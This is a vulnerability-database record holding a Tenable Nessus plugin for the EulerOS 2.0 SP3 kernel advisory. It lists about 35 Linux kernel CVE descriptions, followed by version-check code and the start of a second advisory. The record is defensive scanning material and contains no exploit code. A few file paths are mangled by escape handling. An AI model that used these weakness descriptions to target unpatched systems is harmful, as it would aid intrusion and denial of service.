as root (e.g., inside a default LXC container or with\n the CAP_NET_ADMIN capability) or after namespace\n unsharing. This occurs because sk_type and protocol are\n not checked in the appropriate part of the ip6_mroute_*\n functions. 
NOTE: this affects Linux distributions that\n use 4.9.x longterm kernels before\n 4.9.187.(CVE-2017-18509)An issue was discovered in the\n Linux kernel before 4.14.11. A double free may be\n caused by the function allocate_trace_buffer in the\n file kernel/trace/trace.c.(CVE-2017-18595)An issue was\n discovered in the Linux kernel through 4.17.10. There\n is a NULL pointer dereference and panic in\n hfsplus_lookup() in fs/hfsplus/dir.c when opening a\n file (that is purportedly a hard link) in an hfs+\n filesystem that has malformed catalog data, and is\n mounted read-only without a metadata\n directory.(CVE-2018-14617)An issue was discovered in\n write_tpt_entry in drivers/infiniband/hw/cxgb4/mem.c in\n the Linux kernel through 5.3.2. The cxgb4 driver is\n directly calling dma_map_single (a DMA function) from a\n stack variable. This could allow an attacker to trigger\n a Denial of Service, exploitable if this driver is used\n on an architecture for which this stack/DMA interaction\n has security relevance.(CVE-2019-17075)Double free\n vulnerability in the snd_usbmidi_create function in\n sound/usb/midi.c in the Linux kernel before 4.5 allows\n physically proximate attackers to cause a denial of\n service (panic) or possibly have unspecified other\n impact via vectors involving an invalid USB\n descriptor.(CVE-2016-2384)fs/namespace.c in the Linux\n kernel through 3.16.1 does not properly restrict\n clearing MNT_NODEV, MNT_NOSUID, and MNT_NOEXEC and\n changing MNT_ATIME_MASK during a remount of a bind\n mount, which allows local users to gain privileges,\n interfere with backups and auditing on systems that had\n atime enabled, or cause a denial of service (excessive\n filesystem updating) on systems that had atime disabled\n via a 'mount -o remount' command within a user\n namespace.(CVE-2014-5207)fs/overlayfs/dir.c in the\n OverlayFS filesystem implementation in the Linux kernel\n before 4.6 does not properly verify the upper dentry\n before proceeding with unlink 
and rename system-call\n processing, which allows local users to cause a denial\n of service (system crash) via a rename system call that\n specifies a self-hardlink.(CVE-2016-6197)In the Linux\n kernel before 4.1.4, a buffer overflow occurs when\n checking userspace params in\n drivers/media/dvb-frontends/cx24116.c. The maximum size\n for a DiSEqC command is 6, according to the userspace\n API. However, the code allows larger values such as\n 23.(CVE-2015-9289)In the Linux kernel through 5.3.2,\n cfg80211_mgd_wext_giwessid in net/wireless/wext-sme.c\n does not reject a long SSID IE, leading to a Buffer\n Overflow.(CVE-2019-17133)Insufficient access control in\n the Intel(R) PROSet/Wireless WiFi Software driver\n before version 21.10 may allow an unauthenticated user\n to potentially enable denial of service via adjacent\n access.(CVE-2019-0136)Linux distributions that have not\n patched their long-term kernels with\n https://git.kernel.org/linus/a87938b2e246b81b4fb713edb3\n 71a9fa3c5c3c86 (committed on April 14, 2015). This\n kernel vulnerability was fixed in April 2015 by commit\n a87938b2e246b81b4fb713edb371a9fa3c5c3c86 (backported to\n Linux 3.10.77 in May 2015), but it was not recognized\n as a security threat. 
With\n CONFIG_ARCH_BINFMT_ELF_RANDOMIZE_PIE enabled, and a\n normal top-down address allocation strategy,\n load_elf_binary() will attempt to map a PIE binary into\n an address range immediately below mm->mmap_base.\n Unfortunately, load_elf_binary() does not take account\n of the need to allocate sufficient space for the entire\n binary which means that, while the first PT_LOAD\n segment is mapped below mm->mmap_base, the subsequent\n PT_LOAD segment(s) end up being mapped above\n mm->mmap_base into the area that is supposed to be the\n 'gap' between the stack and the\n binary.(CVE-2017-1000253)Race condition in the\n sclp_ctl_ioctl_sccb function in\n drivers/s390/char/sclp_ctl.c in the Linux kernel before\n 4.6 allows local users to obtain sensitive information\n from kernel memory by changing a certain length value,\n aka a 'double fetch'\n vulnerability.(CVE-2016-6130)rtl_p2p_noa_ie in\n drivers/net/wireless/realtek/rtlwifi/ps.c in the Linux kernel\n through 5.3.6 lacks a certain upper-bound check,\n leading to a buffer\n overflow.(CVE-2019-17666)sound/core/timer.c in the\n Linux kernel through 4.6 does not initialize certain r1\n data structures, which allows local users to obtain\n sensitive information from kernel stack memory via\n crafted use of the ALSA timer interface, related to the\n (1) snd_timer_user_ccallback and (2)\n snd_timer_user_tinterrupt\n functions.(CVE-2016-4578)Systems with microprocessors\n utilizing speculative execution and branch prediction\n may allow unauthorized disclosure of information to an\n attacker with local user access via a side-channel\n analysis.(CVE-2017-5753)The acm_probe function in\n drivers/usb/class/cdc-acm.c in the Linux kernel before\n 4.5.1 allows physically proximate attackers to cause a\n denial of service (NULL pointer dereference and system\n crash) via a USB device without both a control and a\n data endpoint descriptor.(CVE-2016-3138)The\n arcmsr_iop_message_xfer function in\n 
drivers/scsi/arcmsr/arcmsr_hba.c in the Linux kernel\n through 4.8.2 does not restrict a certain length field,\n which allows local users to gain privileges or cause a\n denial of service (heap-based buffer overflow) via an\n ARCMSR_MESSAGE_WRITE_WQBUFFER control\n code.(CVE-2016-7425)The ati_remote2_probe function in\n drivers/input/misc/ati_remote2.c in the Linux kernel\n before 4.5.1 allows physically proximate attackers to\n cause a denial of service (NULL pointer dereference and\n system crash) via a crafted endpoints value in a USB\n device descriptor.(CVE-2016-2185)The\n create_fixed_stream_quirk function in\n sound/usb/quirks.c in the snd-usb-audio driver in the\n Linux kernel before 4.5.1 allows physically proximate\n attackers to cause a denial of service (NULL pointer\n dereference or double free, and system crash) via a\n crafted endpoints value in a USB device\n descriptor.(CVE-2016-2184)The digi_port_init function\n in drivers/usb/serial/digi_acceleport.c in the Linux\n kernel before 4.5.1 allows physically proximate\n attackers to cause a denial of service (NULL pointer\n dereference and system crash) via a crafted endpoints\n value in a USB device descriptor.(CVE-2016-3140)The\n do_remount function in fs/namespace.c in the Linux kernel\n through 3.16.1 does not maintain the MNT_LOCK_READONLY\n bit across a remount of a bind mount, which allows\n local users to bypass an intended read-only restriction\n and defeat certain sandbox protection mechanisms via a\n 'mount -o remount' command within a user\n namespace.(CVE-2014-5206)The gtco_probe function in\n drivers/input/tablet/gtco.c in the Linux kernel through\n 4.5.2 allows physically proximate attackers to cause a\n denial of service (NULL pointer dereference and system\n crash) via a crafted endpoints value in a USB device\n descriptor.(CVE-2016-2187)The hub_activate function in\n drivers/usb/core/hub.c in the Linux kernel before 4.3.5\n does not properly maintain a hub-interface data\n structure, 
which allows physically proximate attackers\n to cause a denial of service (invalid memory access and\n system crash) or possibly have unspecified other impact\n by unplugging a USB hub device.(CVE-2015-8816)The\n ims_pcu_parse_cdc_data function in\n drivers/input/misc/ims-pcu.c in the Linux kernel before\n 4.5.1 allows physically proximate attackers to cause a\n denial of service (system crash) via a USB device\n without both a master and a slave\n interface.(CVE-2016-3689)The Linux Kernel running on\n AMD64 systems will sometimes map the contents of PIE\n executable, the heap or ld.so to where the stack is\n mapped allowing attackers to more easily manipulate the\n stack. Linux Kernel version 4.11.5 is\n affected.(CVE-2017-1000379)The powermate_probe function\n in drivers/input/misc/powermate.c in the Linux kernel\n before 4.5.1 allows physically proximate attackers to\n cause a denial of service (NULL pointer dereference and\n system crash) via a crafted endpoints value in a USB\n device descriptor.(CVE-2016-2186)The signal\n implementation in the Linux kernel before 4.3.5 on\n powerpc platforms does not check for an MSR with both\n the S and T bits set, which allows local users to cause\n a denial of service (TM Bad Thing exception and panic)\n via a crafted application.(CVE-2015-8844)The\n snd_timer_user_params function in sound/core/timer.c in\n the Linux kernel through 4.6 does not initialize a\n certain data structure, which allows local users to\n obtain sensitive information from kernel stack memory\n via crafted use of the ALSA timer\n interface.(CVE-2016-4569)The tm_reclaim_thread function\n in arch/powerpc/kernel/process.c in the Linux kernel\n before 4.4.1 on powerpc platforms does not ensure that\n TM suspend mode exists before proceeding with a\n tm_reclaim call, which allows local users to cause a\n denial of service (TM Bad Thing exception and panic)\n via a crafted application.(CVE-2015-8845)The VFS\n subsystem in the Linux kernel 3.x provides 
an\n incomplete set of requirements for setattr operations\n that underspecifies removing extended privilege\n attributes, which allows local users to cause a denial\n of service (capability stripping) via a failed\n invocation of a system call, as demonstrated by using\n chown to remove a capability from the ping or Wireshark\n dumpcap program.(CVE-2015-1350)The wacom_probe function\n in drivers/input/tablet/wacom_sys.c in the Linux kernel\n before 3.17 allows physically proximate attackers to\n cause a denial of service (NULL pointer dereference and\n system crash) via a crafted endpoints value in a USB\n device descriptor.(CVE-2016-3139)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 11, "cvss3": {"score": 8.8, "vector": "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-12-18T00:00:00", "title": "EulerOS 2.0 SP3 : kernel (EulerOS-SA-2019-2599)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2384", "CVE-2017-5753", "CVE-2015-3332", "CVE-2017-18595", "CVE-2019-0136", "CVE-2019-17666", "CVE-2016-3689", "CVE-2016-3139", "CVE-2015-9289", "CVE-2017-18551", "CVE-2016-2186", "CVE-2016-2187", "CVE-2014-5206", "CVE-2016-4569", "CVE-2016-7425", "CVE-2017-1000379", "CVE-2016-2184", "CVE-2017-1000253", "CVE-2019-17075", "CVE-2015-1350", "CVE-2014-4608", "CVE-2016-6197", "CVE-2018-14617", "CVE-2016-3138", "CVE-2016-3140", "CVE-2017-18509", "CVE-2016-4578", "CVE-2014-5207", "CVE-2015-8816", "CVE-2016-2185", "CVE-2016-6130", "CVE-2015-8844", "CVE-2015-8845", "CVE-2017-13168", "CVE-2019-17133"], "modified": "2019-12-18T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:kernel-tools", "p-cpe:/a:huawei:euleros:kernel", "p-cpe:/a:huawei:euleros:perf", "p-cpe:/a:huawei:euleros:kernel-headers", 
"p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64", "p-cpe:/a:huawei:euleros:kernel-devel", "p-cpe:/a:huawei:euleros:python-perf", "p-cpe:/a:huawei:euleros:kernel-tools-libs", "p-cpe:/a:huawei:euleros:kernel-debuginfo", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2019-2599.NASL", "href": "https://www.tenable.com/plugins/nessus/132134", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132134);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2014-4608\",\n \"CVE-2014-5206\",\n \"CVE-2014-5207\",\n \"CVE-2015-1350\",\n \"CVE-2015-3332\",\n \"CVE-2015-8816\",\n \"CVE-2015-8844\",\n \"CVE-2015-8845\",\n \"CVE-2015-9289\",\n \"CVE-2016-2184\",\n \"CVE-2016-2185\",\n \"CVE-2016-2186\",\n \"CVE-2016-2187\",\n \"CVE-2016-2384\",\n \"CVE-2016-3138\",\n \"CVE-2016-3139\",\n \"CVE-2016-3140\",\n \"CVE-2016-3689\",\n \"CVE-2016-4569\",\n \"CVE-2016-4578\",\n \"CVE-2016-6130\",\n \"CVE-2016-6197\",\n \"CVE-2016-7425\",\n \"CVE-2017-1000253\",\n \"CVE-2017-1000379\",\n \"CVE-2017-13168\",\n \"CVE-2017-18509\",\n \"CVE-2017-18551\",\n \"CVE-2017-18595\",\n \"CVE-2017-5753\",\n \"CVE-2018-14617\",\n \"CVE-2019-0136\",\n \"CVE-2019-17075\",\n \"CVE-2019-17133\",\n \"CVE-2019-17666\"\n );\n script_bugtraq_id(\n 68214,\n 69214,\n 69216,\n 74232\n );\n\n script_name(english:\"EulerOS 2.0 SP3 : kernel (EulerOS-SA-2019-2599)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - The kernel 
package contains the Linux kernel (vmlinuz),\n the core of any Linux operating system. The kernel\n handles the basic functions of the operating system:\n memory allocation, process allocation, device input and\n output, etc.Security Fix(es):** DISPUTED ** Multiple\n integer overflows in the lzo1x_decompress_safe function\n in lib/lzo/lzo1x_decompress_safe.c in the LZO\n decompressor in the Linux kernel before 3.15.2 allow\n context-dependent attackers to cause a denial of\n service (memory corruption) via a crafted Literal Run.\n NOTE: the author of the LZO algorithms says 'the Linux\n kernel is *not* affected media hype.'(CVE-2014-4608)A\n certain backport in the TCP Fast Open implementation\n for the Linux kernel before 3.18 does not properly\n maintain a count value, which allow local users to\n cause a denial of service (system crash) via the Fast\n Open feature, as demonstrated by visiting the\n chrome://flags/#enable-tcp-fast-open URL when using\n certain 3.10.x through 3.16.x kernel builds, including\n longterm-maintenance releases and ckt (aka Canonical\n Kernel Team) builds.(CVE-2015-3332)An elevation of\n privilege vulnerability in the kernel scsi driver.\n Product: Android. Versions: Android kernel. Android ID\n A-65023233.(CVE-2017-13168)An issue was discovered in\n drivers/i2c/i2c-core-smbus.c in the Linux kernel before\n 4.14.15. There is an out of bounds write in the\n function i2c_smbus_xfer_emulated.(CVE-2017-18551)An\n issue was discovered in net/ipv6/ip6mr.c in the Linux\n kernel before 4.11. By setting a specific socket\n option, an attacker can control a pointer in kernel\n land and cause an inet_csk_listen_stop general\n protection fault, or potentially execute arbitrary code\n under certain circumstances. The issue can be triggered\n as root (e.g., inside a default LXC container or with\n the CAP_NET_ADMIN capability) or after namespace\n unsharing. 
This occurs because sk_type and protocol are\n not checked in the appropriate part of the ip6_mroute_*\n functions. NOTE: this affects Linux distributions that\n use 4.9.x longterm kernels before\n 4.9.187.(CVE-2017-18509)An issue was discovered in the\n Linux kernel before 4.14.11. A double free may be\n caused by the function allocate_trace_buffer in the\n file kernel/trace/trace.c.(CVE-2017-18595)An issue was\n discovered in the Linux kernel through 4.17.10. There\n is a NULL pointer dereference and panic in\n hfsplus_lookup() in fs/hfsplus/dir.c when opening a\n file (that is purportedly a hard link) in an hfs+\n filesystem that has malformed catalog data, and is\n mounted read-only without a metadata\n directory.(CVE-2018-14617)An issue was discovered in\n write_tpt_entry in drivers/infiniband/hw/cxgb4/mem.c in\n the Linux kernel through 5.3.2. The cxgb4 driver is\n directly calling dma_map_single (a DMA function) from a\n stack variable. This could allow an attacker to trigger\n a Denial of Service, exploitable if this driver is used\n on an architecture for which this stack/DMA interaction\n has security relevance.(CVE-2019-17075)Double free\n vulnerability in the snd_usbmidi_create function in\n sound/usb/midi.c in the Linux kernel before 4.5 allows\n physically proximate attackers to cause a denial of\n service (panic) or possibly have unspecified other\n impact via vectors involving an invalid USB\n descriptor.(CVE-2016-2384)fsamespace.c in the Linux\n kernel through 3.16.1 does not properly restrict\n clearing MNT_NODEV, MNT_NOSUID, and MNT_NOEXEC and\n changing MNT_ATIME_MASK during a remount of a bind\n mount, which allows local users to gain privileges,\n interfere with backups and auditing on systems that had\n atime enabled, or cause a denial of service (excessive\n filesystem updating) on systems that had atime disabled\n via a 'mount -o remount' command within a user\n namespace.(CVE-2014-5207)fs/overlayfs/dir.c in the\n OverlayFS filesystem 
implementation in the Linux kernel\n before 4.6 does not properly verify the upper dentry\n before proceeding with unlink and rename system-call\n processing, which allows local users to cause a denial\n of service (system crash) via a rename system call that\n specifies a self-hardlink.(CVE-2016-6197)In the Linux\n kernel before 4.1.4, a buffer overflow occurs when\n checking userspace params in\n drivers/media/dvb-frontends/cx24116.c. The maximum size\n for a DiSEqC command is 6, according to the userspace\n API. However, the code allows larger values such as\n 23.(CVE-2015-9289)In the Linux kernel through 5.3.2,\n cfg80211_mgd_wext_giwessid in net/wireless/wext-sme.c\n does not reject a long SSID IE, leading to a Buffer\n Overflow.(CVE-2019-17133)Insufficient access control in\n the Intel(R) PROSet/Wireless WiFi Software driver\n before version 21.10 may allow an unauthenticated user\n to potentially enable denial of service via adjacent\n access.(CVE-2019-0136)Linux distributions that have not\n patched their long-term kernels with\n https://git.kernel.org/linus/a87938b2e246b81b4fb713edb3\n 71a9fa3c5c3c86 (committed on April 14, 2015). This\n kernel vulnerability was fixed in April 2015 by commit\n a87938b2e246b81b4fb713edb371a9fa3c5c3c86 (backported to\n Linux 3.10.77 in May 2015), but it was not recognized\n as a security threat. 
With\n CONFIG_ARCH_BINFMT_ELF_RANDOMIZE_PIE enabled, and a\n normal top-down address allocation strategy,\n load_elf_binary() will attempt to map a PIE binary into\n an address range immediately below mm->mmap_base.\n Unfortunately, load_elf_ binary() does not take account\n of the need to allocate sufficient space for the entire\n binary which means that, while the first PT_LOAD\n segment is mapped below mm->mmap_base, the subsequent\n PT_LOAD segment(s) end up being mapped above\n mm->mmap_base into the are that is supposed to be the\n 'gap' between the stack and the\n binary.(CVE-2017-1000253)Race condition in the\n sclp_ctl_ioctl_sccb function in\n drivers/s390/char/sclp_ctl.c in the Linux kernel before\n 4.6 allows local users to obtain sensitive information\n from kernel memory by changing a certain length value,\n aka a 'double fetch'\n vulnerability.(CVE-2016-6130)rtl_p2p_noa_ie in drivers\n et/wireless/realtek/rtlwifi/ps.c in the Linux kernel\n through 5.3.6 lacks a certain upper-bound check,\n leading to a buffer\n overflow.(CVE-2019-17666)sound/core/timer.c in the\n Linux kernel through 4.6 does not initialize certain r1\n data structures, which allows local users to obtain\n sensitive information from kernel stack memory via\n crafted use of the ALSA timer interface, related to the\n (1) snd_timer_user_ccallback and (2)\n snd_timer_user_tinterrupt\n functions.(CVE-2016-4578)Systems with microprocessors\n utilizing speculative execution and branch prediction\n may allow unauthorized disclosure of information to an\n attacker with local user access via a side-channel\n analysis.(CVE-2017-5753)The acm_probe function in\n drivers/usb/class/cdc-acm.c in the Linux kernel before\n 4.5.1 allows physically proximate attackers to cause a\n denial of service (NULL pointer dereference and system\n crash) via a USB device without both a control and a\n data endpoint descriptor.(CVE-2016-3138)The\n arcmsr_iop_message_xfer function in\n 
drivers/scsi/arcmsr/arcmsr_hba.c in the Linux kernel\n through 4.8.2 does not restrict a certain length field,\n which allows local users to gain privileges or cause a\n denial of service (heap-based buffer overflow) via an\n ARCMSR_MESSAGE_WRITE_WQBUFFER control\n code.(CVE-2016-7425)The ati_remote2_probe function in\n drivers/input/misc/ati_remote2.c in the Linux kernel\n before 4.5.1 allows physically proximate attackers to\n cause a denial of service (NULL pointer dereference and\n system crash) via a crafted endpoints value in a USB\n device descriptor.(CVE-2016-2185)The\n create_fixed_stream_quirk function in\n sound/usb/quirks.c in the snd-usb-audio driver in the\n Linux kernel before 4.5.1 allows physically proximate\n attackers to cause a denial of service (NULL pointer\n dereference or double free, and system crash) via a\n crafted endpoints value in a USB device\n descriptor.(CVE-2016-2184)The digi_port_init function\n in drivers/usb/serial/digi_acceleport.c in the Linux\n kernel before 4.5.1 allows physically proximate\n attackers to cause a denial of service (NULL pointer\n dereference and system crash) via a crafted endpoints\n value in a USB device descriptor.(CVE-2016-3140)The\n do_remount function in fsamespace.c in the Linux kernel\n through 3.16.1 does not maintain the MNT_LOCK_READONLY\n bit across a remount of a bind mount, which allows\n local users to bypass an intended read-only restriction\n and defeat certain sandbox protection mechanisms via a\n 'mount -o remount' command within a user\n namespace.(CVE-2014-5206)The gtco_probe function in\n drivers/input/tablet/gtco.c in the Linux kernel through\n 4.5.2 allows physically proximate attackers to cause a\n denial of service (NULL pointer dereference and system\n crash) via a crafted endpoints value in a USB device\n descriptor.(CVE-2016-2187)The hub_activate function in\n drivers/usb/core/hub.c in the Linux kernel before 4.3.5\n does not properly maintain a hub-interface data\n structure, 
which allows physically proximate attackers\n to cause a denial of service (invalid memory access and\n system crash) or possibly have unspecified other impact\n by unplugging a USB hub device.(CVE-2015-8816)The\n ims_pcu_parse_cdc_data function in\n drivers/input/misc/ims-pcu.c in the Linux kernel before\n 4.5.1 allows physically proximate attackers to cause a\n denial of service (system crash) via a USB device\n without both a master and a slave\n interface.(CVE-2016-3689)The Linux Kernel running on\n AMD64 systems will sometimes map the contents of PIE\n executable, the heap or ld.so to where the stack is\n mapped allowing attackers to more easily manipulate the\n stack. Linux Kernel version 4.11.5 is\n affected.(CVE-2017-1000379)The powermate_probe function\n in drivers/input/misc/powermate.c in the Linux kernel\n before 4.5.1 allows physically proximate attackers to\n cause a denial of service (NULL pointer dereference and\n system crash) via a crafted endpoints value in a USB\n device descriptor.(CVE-2016-2186)The signal\n implementation in the Linux kernel before 4.3.5 on\n powerpc platforms does not check for an MSR with both\n the S and T bits set, which allows local users to cause\n a denial of service (TM Bad Thing exception and panic)\n via a crafted application.(CVE-2015-8844)The\n snd_timer_user_params function in sound/core/timer.c in\n the Linux kernel through 4.6 does not initialize a\n certain data structure, which allows local users to\n obtain sensitive information from kernel stack memory\n via crafted use of the ALSA timer\n interface.(CVE-2016-4569)The tm_reclaim_thread function\n in arch/powerpc/kernel/process.c in the Linux kernel\n before 4.4.1 on powerpc platforms does not ensure that\n TM suspend mode exists before proceeding with a\n tm_reclaim call, which allows local users to cause a\n denial of service (TM Bad Thing exception and panic)\n via a crafted application.(CVE-2015-8845)The VFS\n subsystem in the Linux kernel 3.x provides 
an\n incomplete set of requirements for setattr operations\n that underspecifies removing extended privilege\n attributes, which allows local users to cause a denial\n of service (capability stripping) via a failed\n invocation of a system call, as demonstrated by using\n chown to remove a capability from the ping or Wireshark\n dumpcap program.(CVE-2015-1350)The wacom_probe function\n in drivers/input/tablet/wacom_sys.c in the Linux kernel\n before 3.17 allows physically proximate attackers to\n cause a denial of service (NULL pointer dereference and\n system crash) via a crafted endpoints value in a USB\n device descriptor.(CVE-2016-3139)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-2599\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fc6af25f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/18\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(3)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-3.10.0-514.44.5.10.h234\",\n \"kernel-debuginfo-3.10.0-514.44.5.10.h234\",\n \"kernel-debuginfo-common-x86_64-3.10.0-514.44.5.10.h234\",\n \"kernel-devel-3.10.0-514.44.5.10.h234\",\n \"kernel-headers-3.10.0-514.44.5.10.h234\",\n \"kernel-tools-3.10.0-514.44.5.10.h234\",\n \"kernel-tools-libs-3.10.0-514.44.5.10.h234\",\n \"perf-3.10.0-514.44.5.10.h234\",\n \"python-perf-3.10.0-514.44.5.10.h234\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"3\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n 
exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T09:04:54", "description": "According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - The kernel package contains the Linux kernel (vmlinuz),\n the core of any Linux operating system. The kernel\n handles the basic functions of the operating system:\n memory allocation, process allocation, device input and\n output, etc.Security Fix(es):In the Linux kernel before\n 5.5.8, get_raw_socket in drivers/vhost/ net.c lacks\n validation of an sk_family field, which might allow\n attackers to trigger kernel stack corruption via\n crafted system calls.(CVE-2020-10942)In the Linux\n kernel 5.0.21, a setxattr operation, after a mount of a\n crafted ext4 image, can cause a slab-out-of-bounds\n write access because of an ext4_xattr_set_entry\n use-after-free in fs/ext4/xattr.c when a large old_size\n value is used in a memset call.(CVE-2019-19319)In\n kernel/compat.c in the Linux kernel before 3.17, as\n used in Google Chrome OS and other products, there is a\n possible out-of-bounds read. restart_syscall uses\n uninitialized data when restarting\n compat_sys_nanosleep. 
NOTE: this is disputed because\n the code path is unreachable.(CVE-2014-3180)In the\n Linux kernel 5.4.0-rc2, there is a use-after-free\n (read) in the __blk_add_trace function in\n kernel/trace/blktrace.c (which is used to fill out a\n blk_io_trace structure and place it in a per-cpu\n sub-buffer).(CVE-2019-19768)There is a use-after-free\n vulnerability in the Linux kernel through 5.5.2 in the\n vc_do_resize function in\n drivers/tty/vt/vt.c.(CVE-2020-8647)There is a\n use-after-free vulnerability in the Linux kernel\n through 5.5.2 in the vgacon_invert_region function in\n drivers/video/console/vgacon.c.(CVE-2020-8649)drivers/g\n pu/drm/radeon/radeon_display.c in the Linux kernel\n 5.2.14 does not check the alloc_workqueue return value,\n leading to a NULL pointer dereference. NOTE: A\n third-party software maintainer states that the work\n queue allocation is happening during device\n initialization, which for a graphics card occurs during\n boot. It is not attacker controllable and OOM at that\n time is highly unlikely.(CVE-2019-16230)There is a\n use-after-free vulnerability in the Linux kernel\n through 5.5.2 in the n_tty_receive_buf_common function\n in drivers/tty/ n_tty.c.(CVE-2020-8648)A flaw was\n discovered in the way that the KVM hypervisor handled\n instruction emulation for an L2 guest when nested\n virtualisation is enabled. Under some circumstances, an\n L2 guest may trick the L0 guest into accessing\n sensitive L1 resources that should be inaccessible to\n the L2 guest.(CVE-2020-2732)An issue was discovered in\n the Linux kernel through 5.5.6. 
